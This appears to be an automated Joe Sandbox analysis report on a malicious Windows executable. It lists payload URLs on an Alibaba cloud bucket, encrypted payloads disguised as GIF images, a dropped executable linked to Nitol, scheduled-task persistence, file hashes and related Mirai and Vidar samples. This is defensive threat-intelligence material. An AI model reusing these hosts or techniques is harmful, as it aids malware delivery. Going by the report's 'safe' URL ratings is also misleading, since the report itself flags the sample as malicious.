Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0000000000000000.exe	20%	Virustotal		Browse
0000000000000000.exe	100%	Avira	HEUR/AGEN.1317034

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Documents\Y1mbCC.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
https://3syd1z.oss-cn-beijing.aliyuncs.com/)pY	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifY	0%	Avira URL Cloud	safe
http://ggbtu.be/b579179	0%	Avira URL Cloud	safe
http://www.extensis.com/meta/FontSense/	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifO	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifs	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifjing.aliyuncs.com/~W	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/7-2476756634-10024	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/fW	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.jpg	0%	Avira URL Cloud	safe
http://www.npes.org/pdfx/ns/id/	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/T	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifQ	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifI	0%	Avira URL Cloud	safe
http://cevcsca2021.ocsp-certum.com07	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifa	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/hW	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/i.dat	0%	Avira URL Cloud	safe
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	0%	Avira URL Cloud	safe
http://www.color.org)/S/GTS_PDFX/Type/OutputIntent	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif%	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifz	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.dat	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/tW	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/XW	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifs	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/2T	0%	Avira URL Cloud	safe
http://ggbtu.be/b579179yX	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifE	0%	Avira URL Cloud	safe
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	39.103.20.97	true	false		high
3syd1z.oss-cn-beijing.aliyuncs.com	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gif	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.jpg	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gif	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/i.dat	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gif	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/s.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://3syd1z.oss-cn-beijing.aliyuncs.com/7-2476756634-10024	0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://adoptium.net/	0000000000000000.exe	false		high
http://crl.certum.pl/ctsca2021.crl0o	0000000000000000.exe	false		high
http://www.extensis.com/meta/FontSense/	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)08:27	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifO	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifjing.aliyuncs.com/~W	0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ggbtu.be/b579179	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://adoptium.net/https://discord.gg/BdCcpDZ322562An	0000000000000000.exe	false		high
http://cipa.jp/exif/1.0/	0000000000000000.exe	false		high
http://repository.certum.pl/cevcsca2021.cer0	0000000000000000.exe	false		high
http://bugreports.qt.io/	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/)pY	0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifY	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/	0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	false		high
http://repository.certum.pl/ctsca2021.cer0	0000000000000000.exe	false		high
http://subca.ocsp-certum.com05	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifs	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	0000000000000000.exe	false		high
http://subca.ocsp-certum.com01	0000000000000000.exe	false		high
http://www.npes.org/pdfx/ns/id/	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/fW	0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	0000000000000000.exe	false		high
http://repository.certum.pl/ctnca2.cer09	0000000000000000.exe	false		high
http://www.certum.pl/CPS0	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/T	0000000000000000.exe, 00000000.00000003.2557361451.00000000004D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cevcsca2021.ocsp-certum.com07	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifa	0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifI	0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctnca.cer09	0000000000000000.exe	false		high
http://crl.certum.pl/ctnca.crl0k	0000000000000000.exe	false		high
http://ocsp.thawte.com0	Y1mbCC.exe.0.dr, 189atohci.sys.0.dr	false		high
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifQ	0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/hW	0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	0000000000000000.exe	false		high
http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://www.certum.pl/CPS0	0000000000000000.exe	false		high
http://www.color.org)/S/GTS_PDFX/Type/OutputIntent	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gif%	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/cps0(	Y1mbCC.exe.0.dr	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/c.gifz	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/tW	0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/2T	0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/XW	0000000000000000.exe, 00000000.00000003.2557361451.00000000004F1000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.00000000004F0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.gg/BdCcpDZ	0000000000000000.exe	false		high
http://www.symauth.com/rpa00	Y1mbCC.exe.0.dr	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifs	0000000000000000.exe, 00000000.00000003.2557361451.00000000004C5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ggbtu.be/b579179yX	0000000000000000.exe	false	Avira URL Cloud: safe	unknown
http://bugreports.qt.io/_q_receiveReplyensureClientPrefaceSentMicrosoft-IIS/4.Microsoft-IIS/5.Netsca	0000000000000000.exe	false		high
https://3syd1z.oss-cn-beijing.aliyuncs.com/d.gifE	0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://3syd1z.oss-cn-beijing.aliyuncs.com/a.gifhttps://3syd1z.oss-cn-beijing.aliyuncs.com/b.gifhttp	0000000000000000.exe, 00000000.00000003.2557361451.0000000000523000.00000004.00000020.00020000.00000000.sdmp, 0000000000000000.exe, 00000000.00000003.2597126202.0000000000523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
39.103.20.97	sc-2ox2.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China		37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1582965
Start date and time:	2025-01-01 08:22:10 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	0000000000000000.exe
Detection:	MAL
Classification:	mal88.evad.winEXE@4/12@1/1
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 58% Number of executed functions: 12 Number of non-executed functions: 190
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Y1mbCC.exe, PID 3584 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:23:03	API Interceptor	941x Sleep call for process: 0000000000000000.exe modified
07:24:44	Task Scheduler	Run new task: aD6BA path: C:\Users\user\Documents\Y1mbCC.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	kwari.mpsl.elf	Get hash	malicious	Unknown	Browse	42.120.21.89
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	47.124.9.123
	botx.m68k.elf	Get hash	malicious	Mirai	Browse	8.178.172.237
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	182.92.191.87
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	47.119.173.205
	arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	8.186.40.138
	mips.elf	Get hash	malicious	Mirai, Moobot	Browse	47.118.42.153
	x86.elf	Get hash	malicious	Mirai, Moobot	Browse	139.240.25.213
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	47.109.52.7
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	121.196.124.232

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	1.ps1	Get hash	malicious	Unknown	Browse	39.103.20.97
	setup.exe	Get hash	malicious	Unknown	Browse	39.103.20.97
	Let's_20Compress.exe	Get hash	malicious	Unknown	Browse	39.103.20.97
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	39.103.20.97
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	39.103.20.97
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	39.103.20.97
	setup.msi	Get hash	malicious	Unknown	Browse	39.103.20.97
	over.ps1	Get hash	malicious	Vidar	Browse	39.103.20.97
	MatAugust.exe	Get hash	malicious	Vidar	Browse	39.103.20.97
	DypA6KbLrn.lnk	Get hash	malicious	Unknown	Browse	39.103.20.97

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\Users\user\Documents\Y1mbCC.exe	T1#U5b89#U88c5#U52a9#U624b1.0.2.exe	Get hash	malicious	Nitol	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\d[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	3892010
Entropy (8bit):	7.995495589600101
Encrypted:	true
SSDEEP:	98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
MD5:	E4E46F3980A9D799B1BD7FC408F488A3
SHA1:	977461A1885C7216E787E5B1E0C752DC2067733A
SHA-256:	6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
SHA-512:	9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\i[1].dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	5.3493267001452045
Encrypted:	false
SSDEEP:	6:WMwfCv+Xa3bbn6EeCrCa2BIDRd3oV1SsYRhfd7OdUzW9E40/qcX:VwavnvpMBIDRBoV1XYRhBgUzWg3
MD5:	A1DCF4DAA9E8E5EDD6705AD2A497E3BB
SHA1:	54E66240A73EC92789338E3E58F0C68D9F173D25
SHA-256:	E36BA7E2A9900328489D8F0E494B07720A838390ECB28FF47FA627E570E576A9
SHA-512:	994AAD5587C17B72DC47695564789BCFAA6771071057C5B0AE031A35A71609D98AD7BE9415D9C37249308E4AEE24280A59E32B1B4E07CB4EE22BC5EF26DE54D1
Malicious:	false
Reputation:	low
Preview:	....l%00.CITe.z;HH.X6u:=TWTS4}2?VFJQ2".2]_.S}4:555555555555555555555555555555555]AAE6.jjY...?t a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33.@JWf-y8KK.[5v9>WTWP7~1<UEIR1!\|1^\.R\|5;444444444444444444444444444444444\@@D7~kkX...>u!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6\|ylllllllllllllllllllllllllllllllllllll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\b[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	125333
Entropy (8bit):	7.993522712936246
Encrypted:	true
SSDEEP:	3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
MD5:	2CA9F4AB0970AA58989D66D9458F8701
SHA1:	FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
SHA-256:	5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
SHA-512:	AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\s[1].jpg

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	8299
Entropy (8bit):	7.9354275320361545
Encrypted:	false
SSDEEP:	192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
MD5:	9BDB6A4AF681470B85A3D46AF5A4F2A7
SHA1:	D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
SHA-256:	5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
SHA-512:	5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
Malicious:	false
Reputation:	low
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE...............CHI........[..>G..C..&.!7..E..)U&.$...z.tuv......?..............

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\c[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10681
Entropy (8bit):	7.866148090449211
Encrypted:	false
SSDEEP:	192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
MD5:	10A818386411EE834D99AE6B7B68BE71
SHA1:	27644B42B02F00E772DCCB8D3E5C6976C4A02386
SHA-256:	7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
SHA-512:	BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\a[1].gif

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	PNG image data, 512 x 512, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	135589
Entropy (8bit):	7.995304392539578
Encrypted:	true
SSDEEP:	3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
MD5:	0DDD3F02B74B01D739C45956D8FD12B7
SHA1:	561836F6228E24180238DF9456707A2443C5795C
SHA-256:	2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
SHA-512:	0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
Malicious:	false
Preview:	.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........\|..z....\|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\s[1].dat

Download File

Process:	C:\Users\user\Desktop\0000000000000000.exe
File Type:	data
Category:	dropped
Size (bytes):	28272
Entropy (8bit):	7.711612842342158
Encrypted:	false
SSDEEP:	384:95egCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQD:C5F1FUdy422IK+gAZt2i0YPpQn4GMw
MD5:	5DA2677B3A6324F426E10B98DD937BD2
SHA1:	DDE9224CBA856CE40DF438424A359E6D6D51F1CD
SHA-256:	8D65D0E5DF502141DAD0311BCD275EC5BE4AF3937A93C8C04A49786FC073A136
SHA-512:	E29DCC55143234AECA421284861029D115D21946AF345F6981C8CC5982E44E8C7B80489ABE825C769DC179F9599FABF382629C59E92FFAA749B79C7EE5FE811C
Malicious:	false
